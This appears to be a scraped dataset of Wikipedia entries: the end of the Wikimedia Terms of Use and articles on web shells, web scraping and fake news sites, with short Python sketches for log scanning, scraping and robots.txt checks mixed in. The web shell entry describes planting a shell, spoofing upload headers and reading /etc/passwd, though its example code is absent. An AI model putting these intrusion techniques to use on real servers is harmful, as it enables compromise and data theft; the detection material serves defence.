Marketing Company Mediations are binding mediations where, at the end of either a half or full day session, any disputed items that remain unresolved will be decided by the mediator in a legally binding decision. They will be conducted in meetings by teleconference or videoconference. If an in-person meeting is required, then the Marketing Company Mediation will take place in San Francisco County, California. The parties will split all fees and expenses related to the mediation arbitration equally. You agree, as part of a Marketing Company Mediation, to cooperate with the Foundation, including by timely providing any documentation in your possession relating to your undisclosed paid editing activities including the accounts used, articles affected, and clients who purchased such services. Marketing Company Mediations are subject to and governed by the Federal Arbitration Act to the extent that the mediator becomes an arbitrator. The prevailing party shall be entitled to recover its attorneys' fees (including all fees necessary to determine the applicability of the Marketing Company Mediation and to enforce the binding result) and all costs relating to the investigation and enforcement of its rights. A party may be deemed "prevailing" even if it is not successful on every claim asserted. If for some reason the entirety of these Marketing Company Mediation requirements are found to be unenforceable, you agree to resolve any disputes as described in the beginning of this section. Highlighted for emphasis At the Wikimedia Foundation, we do our best to provide educational and informational content to a very wide audience, but your use of our services is at your sole risk. We provide these services on an "as is" and "as available" basis, and we expressly disclaim all express or implied warranties of all kinds, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, and non-infringement. We make no warranty that our services will meet your requirements, be safe, secure, uninterrupted, timely, accurate, or error-free, or that your information will be secure. We are not responsible for the content, data, or actions of third parties, and you release us, our directors, officers, employees, and agents from any claims and damages, known and unknown, arising out of or in any way connected with any claim you have against any such third parties. No advice or information, whether oral or written, obtained by you from us or through or from our services creates any warranty not expressly stated in these Terms of Use. Any material downloaded or otherwise obtained through your use of our services is done at your own discretion and risk, and you will be solely responsible for any damage to your computer system or loss of data that results from the download of any such material. You agree that we have no responsibility or liability for the deletion of, or the failure to store or to transmit, any content or communication maintained by the service. We retain the right to create limits on use and storage at our sole discretion at any time with or without notice. Highlighted for emphasis Just as the Wikimedia community's input is essential for the growth and maintenance of the Projects, we believe that community input is essential for these Terms of Use to properly serve our users. It is also essential for a fair contract. 
Therefore, we will provide these Terms of Use, as well as any substantial future revisions of these Terms of Use, to the community for comment at least thirty (30) days before the end of the comment period. If a future proposed revision is substantial, we will provide an additional 30 days for comments after posting a translation of the proposed revision in at least three languages (selected at our discretion). The community will be encouraged to translate the proposed revision in other languages as appropriate. For changes for legal or administrative reasons, to correct an inaccurate statement, or changes in response to community comments, we will provide at least three (3) days' notice. Because it may be necessary to modify these Terms of Use from time to time, we will provide notice of such modifications and the opportunity to comment via the Project websites, and via a notification on WikimediaAnnounce-l. However, we ask that you please periodically review the most up-to-date version of these Terms of Use. Your continued use of our services after the new Terms of Use become official following the notice and review period constitutes an acceptance of these Terms of Use on your part. For the protection of the Wikimedia Foundation and other users like yourself, if you do not agree with our Terms of Use, you cannot use our services. These Terms of Use do not create an employment, agency, partnership, joint control or joint venture relationship between you and us, the Wikimedia Foundation. For the purposes of European Economic Area law, United Kingdom law, or other laws that involve a similar concept, you are not acting "under the authority of" the Foundation when you use the services. If you have not signed a separate agreement with us, these Terms of Use are the entire agreement between you and us. If there is any conflict between these Terms of Use and a signed written agreement between you and us, the signed agreement will control. You agree that we may provide you with notices, including those regarding changes to the Terms of Use, by email, regular mail, or postings on the Projects or Project Websites. If in any circumstance, we do not apply or enforce any provision of these Terms of Use, it is not a waiver of that provision. You understand that, unless otherwise agreed to in writing by us, you have no expectation of compensation for any activity, contribution, or idea that you provide to us, the community, or the Projects or Project editions. Notwithstanding any provision to the contrary in these Terms of Use, we (the Wikimedia Foundation) and you agree not to modify the applicable terms and requirements of any free license that is employed on the Projects or Project editions when such free license is authorized by these Terms of Use. These Terms of Use were written in English (U.S.). While we hope that translations of these Terms of Use are accurate, in the event of any differences in meaning between the original English version and a translation, the original English version takes precedence. If any provision or part of a provision of these Terms of Use is found unlawful, void, or unenforceable, that provision or part of the provision is deemed severable from these Terms of Use and will be enforced to the maximum extent permissible, and all other provisions of these Terms of Use will remain in full force and effect. We appreciate your taking the time to read these Terms of Use, and we are very happy to have you contributing to the Projects and using our services. 
Through your contributions, you are helping to build something really big: not only an important collection of collaboratively edited reference Projects that provides education and information to millions who might otherwise lack access, but also a vibrant community of like-minded and engaged peers, focused on a very noble goal. These Terms of Use went into effect on June 7, 2023. Please note that in the event of any differences in meaning or interpretation between the original English version of this content and a translation, the original English version takes precedence. |
12 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Web_shell | A web shell is a shell-like interface that enables a web server to be remotely accessed, often for the purposes of cyberattacks. 1 A web shell is unique in that a web browser is used to interact with it. 2 3 A web shell could be programmed in any programming language that is supported on a server. Web shells are most commonly written in PHP due to the widespread usage of PHP for web applications. Though Active Server Pages, ASP.NET, Python, Perl, Ruby, and Unix shell scripts are also used. 1 2 3 Using network monitoring tools, an attacker can find vulnerabilities that can potentially allow delivery of a web shell. These vulnerabilities are often present in applications that are run on a web server. 2 An attacker can use a web shell to issue shell commands, perform privilege escalation on the web server, and the ability to upload, delete, download, and execute files to and from the web server. 2 Web shells are used in attacks mostly because they are multi-purpose and difficult to detect. 4 They are commonly used for: Web shells give hackers the ability to steal information, corrupt data, and upload malwares that are more damaging to a system. The issue increasingly escalates when hackers employ compromised servers to infiltrate a system and jeopardize additional machines. Web shells are also a way that malicious individuals target a variety of industries, including government, financial, and defense through cyber espionage. One of the very well known web shells used in this manner is known as “China Chopper. 6 Web shells are installed through vulnerabilities in web application or weak server security configuration including the following: 2 4 An attacker may also modify (spoof) the Content-Type header to be sent by the attacker in a file upload to bypass improper file validation (validation using MIME type sent by the client), which will result in a successful upload of the attacker's shell. The following is a simple example of a web shell written in PHP that executes and outputs the result of a shell command: Assuming the filename is example.php, an example that would output the contents of the etc passwd file is shown below: The above request will take the value of the x parameter of the query string, sending the following shell command: This could have been prevented if the shell functions of PHP were disabled so that arbitrary shell commands cannot be executed from PHP. A web shell is usually installed by taking advantage of vulnerabilities present in the web server's software. That is why removal of these vulnerabilities is important to avoid the potential risk of a compromised web server. The following are security measures for preventing the installation of a web shell: 2 3 Web shells can be easily modified, so it's not easy to detect web shells and antivirus software are often not able to detect web shells. 2 9 The following are common indicators that a web shell is present on a web server: 2 3 For example, a file generating suspicious traffic (e.g. a PNG file requesting with POST parameters). 2 10 11 12 Dubious logins from DMZ servers to internal sub-nets and vice versa. 2 Web shells may also contain a login form, which is often disguised as an error page. 2 13 14 15 Using web shells, adversaries can modify the .htaccess file (on servers running the Apache HTTP Server software) on web servers to redirect search engine requests to the web page with malware or spam. 
Often web shells detect the user-agent, and the content presented to the search engine spider differs from that presented to the user's browser. Finding such a web shell therefore usually requires changing the crawler bot's user-agent. Once the web shell is identified, it can be deleted easily. 2 Analyzing the web server's log can pinpoint the exact location of a web shell: legitimate visitors typically arrive with a variety of user-agents and referers, whereas a web shell is usually visited only by the attacker and therefore shows very few distinct user-agent strings. 2 |
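The log heuristics in the scraped article above can be automated. Below is a minimal, illustrative sketch (not tooling from the article) that scans a web server access log in the common "combined" format, flags paths served to very few distinct user-agents, and flags POST requests aimed at static-looking files. The access.log path, the file-extension lists, and the "two or fewer user-agents" threshold are assumptions for illustration only.

# Sketch only: scan an Apache/Nginx "combined" format access log for the
# web-shell indicators described above. Paths and thresholds are assumptions.
import re
from collections import defaultdict

LOG_LINE = re.compile(
    r'\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

agents_per_path = defaultdict(set)   # distinct user-agents seen per path
post_to_static = defaultdict(int)    # POST requests aimed at image-like files

with open("access.log", encoding="utf-8", errors="replace") as fh:
    for line in fh:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path").split("?")[0]
        agents_per_path[path].add(m.group("agent"))
        if m.group("method") == "POST" and path.lower().endswith((".png", ".jpg", ".gif")):
            post_to_static[path] += 1

for path, agents in agents_per_path.items():
    if path.lower().endswith(".php") and len(agents) <= 2:
        print(f"Few user-agents ({len(agents)}) for {path} - worth inspecting")
for path, hits in post_to_static.items():
    print(f"{hits} POST request(s) to static-looking file {path}")

Paths with a single visitor and script extensions are only candidates; the article notes that confirmation still requires inspecting the file itself.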
13 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&oldid=1240545829 | This is the current revision of this page, as edited by Jayme (talk contribs) at 23:25, 15 August 2024 (Typo corrected). The present address (URL) is a permanent link to this version. Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. 
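Before the comparison with manual copy-and-paste continues below, here is a minimal sketch of the fetch-then-extract cycle described above, using the same libraries installed at the top of this notebook (requests, BeautifulSoup, pandas). The target URL, the choice of heading tags as the data to extract, and the output filename are illustrative assumptions, not part of the article.

# Sketch only: fetch a page, parse it, extract a few items, store them in a CSV.
import requests
import pandas as pd
from bs4 import BeautifulSoup

url = "https://en.wikipedia.org/wiki/Web_scraping"          # illustrative target
resp = requests.get(url, headers={"User-Agent": "example-scraper/0.1"}, timeout=30)
resp.raise_for_status()

soup = BeautifulSoup(resp.text, "html5lib")                 # fetch -> parse
rows = [{"heading": h.get_text(strip=True)}                 # extract what we need
        for h in soup.select("h2, h3")]
pd.DataFrame(rows).to_csv("headings.csv", index=False)      # load into a "spreadsheet"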
Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. 
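As a concrete illustration of the regular-expression approach just mentioned, the short sketch below pulls dollar amounts and percentages out of fetched text, mirroring the $- and %-handling rules used by the cleaning regex earlier in this notebook. The sample string is a stand-in for real page text (e.g. response.text from a request).

# Sketch only: regex-based extraction from already-fetched page text.
import re

page_text = "Premium plans start at $19.99 per month, a 20% discount on the $24.99 list price."

prices = re.findall(r"\$\d+(?:\.\d{2})?", page_text)     # e.g. ['$19.99', '$24.99']
percents = re.findall(r"\d+(?:\.\d+)?%", page_text)      # e.g. ['20%']
print(prices, percents)

This works well for simple, regular patterns; for anything dependent on document structure, the DOM-parsing and XPath techniques described above are more robust.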
The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. 
This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. 
In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. 
In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
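From the scraper's side, the easiest way to coexist with the anti-bot measures mentioned above is to consult robots.txt before fetching and to throttle request rates. The sketch below uses Python's standard urllib.robotparser together with requests; the URLs, user-agent string, and two-second delay are illustrative assumptions.

# Sketch only: check robots.txt and rate-limit requests before scraping.
import time
import requests
from urllib.robotparser import RobotFileParser

BASE = "https://en.wikipedia.org"
rp = RobotFileParser(BASE + "/robots.txt")
rp.read()                                               # fetch and parse robots.txt

urls = [BASE + "/wiki/Web_scraping", BASE + "/wiki/Data_scraping"]
for url in urls:
    if not rp.can_fetch("example-scraper/0.1", url):
        print("Disallowed by robots.txt:", url)
        continue
    resp = requests.get(url, headers={"User-Agent": "example-scraper/0.1"}, timeout=30)
    print(url, resp.status_code)
    time.sleep(2)                                       # simple politeness delay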
14 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Fake_news_website | Fake news websites (also referred to as hoax news websites) 1 2 are websites on the Internet that deliberately publish fake news—hoaxes, propaganda, and disinformation purporting to be real news—often using social media to drive web traffic and amplify their effect. 3 4 5 6 Unlike news satire, fake news websites deliberately seek to be perceived as legitimate and taken at face value, often for financial or political gain. 7 8 4 Such sites have promoted political falsehoods in India, 9 10 Germany, 11 12 Indonesia and the Philippines, 13 Sweden, Mexico, 14 15 Myanmar, 16 and the United States. 17 18 Many sites originate in, or are promoted by, Russia, 3 19 or North Macedonia among others. 20 21 Some media analysts have seen them as a threat to democracy. 12 In 2016, the European Parliament's Committee on Foreign Affairs passed a resolution warning that the Russian government was using "pseudo-news agencies" and Internet trolls as disinformation propaganda to weaken confidence in democratic values. 5 In 2015, the Swedish Security Service, Sweden's national security agency, issued a report concluding Russia was using fake news to inflame "splits in society" through the proliferation of propaganda. 14 Sweden's Ministry of Defence tasked its Civil Contingencies Agency with combating fake news from Russia. 14 Fraudulent news affected politics in Indonesia and the Philippines, where there was simultaneously widespread usage of social media and limited resources to check the veracity of political claims. 13 German Chancellor Angela Merkel warned of the societal impact of "fake sites, bots, trolls". 12 Fraudulent articles spread through social media during the 2016 U.S. presidential election, 17 18 and several officials within the U.S. Intelligence Community said that Russia was engaged in spreading fake news. 22 23 Computer security company FireEye concluded that Russia used social media to spread fake news stories 24 as part of a cyberwarfare campaign. 25 Google and Facebook banned fake sites from using online advertising. 26 27 Facebook launched a partnership with fact-checking websites to flag fraudulent news and hoaxes; debunking organizations that joined the initiative included: Snopes.com, FactCheck.org, and PolitiFact. 28 U.S. President Barack Obama said a disregard for facts created a "dust cloud of nonsense". 29 Chief of the Secret Intelligence Service (MI6) Alex Younger called fake news propaganda online dangerous for democratic nations. 30 The New York Times has defined "fake news" on the internet as fictitious articles deliberately fabricated to deceive readers, generally with the goal of profiting through clickbait. 31 PolitiFact has described fake news as fabricated content designed to fool readers and subsequently made viral through the Internet to crowds that increase its dissemination. 32 Others have taken as constitutive the "systemic features inherent in the design of the sources and channels through which fake news proliferates", for example by playing to the audience's cognitive biases, heuristics, and partisan affiliation. 33 Some fake news websites use website spoofing, structured to make visitors believe they are visiting trusted sources like ABC News or MSNBC. 21 Fake news maintained a presence on the internet and in tabloid journalism in the years prior to the 2016 U.S. presidential election. 
31 Before the election campaign involving Hillary Clinton and Donald Trump, fake news had not impacted the election process and subsequent events to such a high degree. 31 Subsequent to the 2016 election, the issue of fake news turned into a political weapon, with supporters of left-wing politics saying that supporters of right-wing politics spread false news, while the latter claimed that they were being "censored". 31 Due to these back-and-forth complaints, the definition of fake news as used for such polemics has become more vague. 31 Unethical journalistic practices existed in printed media for hundreds of years before the advent of the Internet. 34 35 36 Yellow journalism, reporting from a standard which is devoid of integrity and professional ethics, was pervasive during the time period in history known as the Gilded Age, and unethical journalists would engage in fraud by fabricating stories, interviews, and made-up names for scholars. 35 34 During the 1890s, the spread of this unethical news sparked violence and conflicts. 34 Both Joseph Pulitzer and William Randolph Hearst fomented yellow journalism in order to increase profits, which helped lead to misunderstandings which became partially responsible for the outset of the Spanish American War in 1898. 37 J.B. Montgomery-M'Govern wrote a column harshly critical of "fake news" in 1898, saying that what characterized "fake news" was sensationalism and "the publication of articles absolutely false, which tend to mislead an ignorant or unsuspecting public. 38 A radio broadcast from Gleiwitz by German soldier Karl Hornack, pretending to be a Polish invader who had captured the station, was taken at face value by other stations, in Germany and abroad, fueling Adolf Hitler's declaration of war on Poland the next day. 39 According to USA Today, newspapers which have a history of commonly publishing fake news have included Globe, Weekly World News, and The National Enquirer. 37 Common characteristics of fake news websites, as noted by many fact-checkers and journalists, are sorted into several categories: Many fake news websites can be assessed as likely being part of the same network campaign if some combination of the following are true: Prominent among fraudulent news sites include false propaganda created by individuals in the countries of Russia, 3 5 North Macedonia, 20 21 Romania, 89 and the United States. 90 91 Much of the fake news during the 2016 U.S. presidential election season was traced to adolescents in North Macedonia, 20 92 specifically Veles. It is a town of 50,000 in the middle of the country, with high unemployment, where the average wage is $4,800. 93 The income from fake news was characterized by NBC News as a gold rush. 93 Adults supported this income, saying they were happy the youths were working. 94 The mayor of Veles, Slavcho Chadiev, said he was not bothered by their actions, as they were not against Macedonian law and their finances were taxable. 93 Chadiev said he was happy if deception from Veles influenced the results of the 2016 U.S. election in favor of Trump. 93 BuzzFeed News and The Guardian separately investigated and found teenagers in Veles created over 100 sites spreading fake news stories supportive of Donald Trump. 20 95 96 The teenagers experimented with left slanted fake stories about Bernie Sanders, but found that pro-Trump fictions were more popular. 95 Prior to the 2016 election the teenagers gained revenues from fake medical advice sites. 
97 One youth named Alex stated, in an August 2016 interview with The Guardian, that this fraud would remain profitable regardless of who won the election. 20 Alex explained he plagiarized material for articles by copying and pasting from other websites. 20 This could net them thousands of dollars daily, but they averaged only a few thousand per month. 97 The Associated Press (AP) interviewed an 18 year-old in Veles about his tactics. 94 A Google Analytics analysis of his traffic showed more than 650,000 views in one week. 94 He plagiarized pro-Trump stories from a right-wing site called The Political Insider. 94 He said he did not care about politics, and published fake news to gain money and experience. 94 The AP used DomainTools to confirm the teenager was behind fake sites, and determined there were about 200 websites tracked to Veles focused on U.S. news, many of which mostly contained plagiarized legitimate news to create an appearance of credibility. 94 NBC News also interviewed an 18 year-old there. 93 Dmitri (a pseudonym) was one of the most profitable fake news operators in town, and said about 300 people in Veles wrote for fake sites. 93 Dmitri said he gained over $60,000 during the six months prior through doing this, more than both his parents' earnings. 93 Dmitri said his main dupes were supporters of Trump. 93 He said after the 2016 U.S. election he continued to earn significant amounts. 93 The 2020 U.S. election is their next project. 98 "Ending the Fed", a popular purveyor of fraudulent reports, was run by a 24 year-old named Ovidiu Drobota out of Oradea, Romania, who boasted to Inc. magazine about being more popular than mainstream media. 89 Established in March 2016, "Ending the Fed" was responsible for a false story in August 2016 that incorrectly stated Fox News had fired journalist Megyn Kelly—the story was briefly prominent on Facebook on its "Trending News" section. 89 "Ending the Fed" held four out of the 10 most popular fake articles on Facebook related to the 2016 U.S. election in the prior three months before the election itself. 89 The Facebook page for the website, called "End the Feed", had 350,000 "likes" in November 2016. 89 After being contacted by Inc. magazine, Drobota stated he was proud of the impact he had on the 2016 U.S. election in favor of his preferred candidate Donald Trump. 89 According to Alexa Internet, "Ending the Fed" garnered approximately 3.4 million views over a 30 day-period in November 2016. 89 Drobota stated the majority of incoming traffic is from Facebook. 89 He said his normal line of work before starting "Ending the Fed" included web development and search engine optimization. 89 Beginning in fall 2014, The New Yorker writer Adrian Chen performed a six-month investigation into Russian propaganda dissemination online by the Internet Research Agency (IRA). 19 Yevgeny Prigozhin (Evgeny Prigozhin), a close associate of Vladimir Putin, was behind the operation which hired hundreds of individuals to work in Saint Petersburg. 19 The organization became regarded as a "troll farm", a term used to refer to propaganda efforts controlling many accounts online with the aim of artificially providing a semblance of a grassroots organization. 19 Chen reported that Internet trolling was used by the Russian government as a tactic largely after observing the social media organization of the 2011 protests against Putin. 
19 In 2015, the Organization for Security and Co-operation in Europe released an analysis critical of disinformation campaigns by Russia masked as news. 99 This was intended to interfere with Ukraine relations with Europe after the removal of former Ukraine president Viktor Yanukovych. 99 According to Deutsche Welle, similar tactics were used in the 2016 U.S. elections. 99 The European Union created a taskforce to deal with Russian disinformation. 5 99 100 The taskforce, East StratCom Team, had 11 people including Russian speakers. 101 In November 2016, the EU voted to increase the group's funding. 101 In November 2016, the European Parliament Committee on Foreign Affairs passed a resolution warning of the use by Russia of tools including: "pseudo-news agencies ... social media and internet trolls" as disinformation to weaken democratic values. 5 The resolution requested EU analysts investigate, explaining member nations needed to be wary of disinformation. 5 The resolution condemned Russian sources for publicizing "absolutely fake" news reports. 102 The tally on 23 November 2016 passed by a margin of 304 votes to 179. 102 The U.S. State Department planned to use a unit called the Counter-Disinformation Team, formed with the intention of combating disinformation from the Russian government, and that it was disbanded in September 2015 after department heads missed the scope of propaganda before the 2016 U.S. election. 103 104 The U.S. State Department put eight months into developing the unit before scrapping it. 103 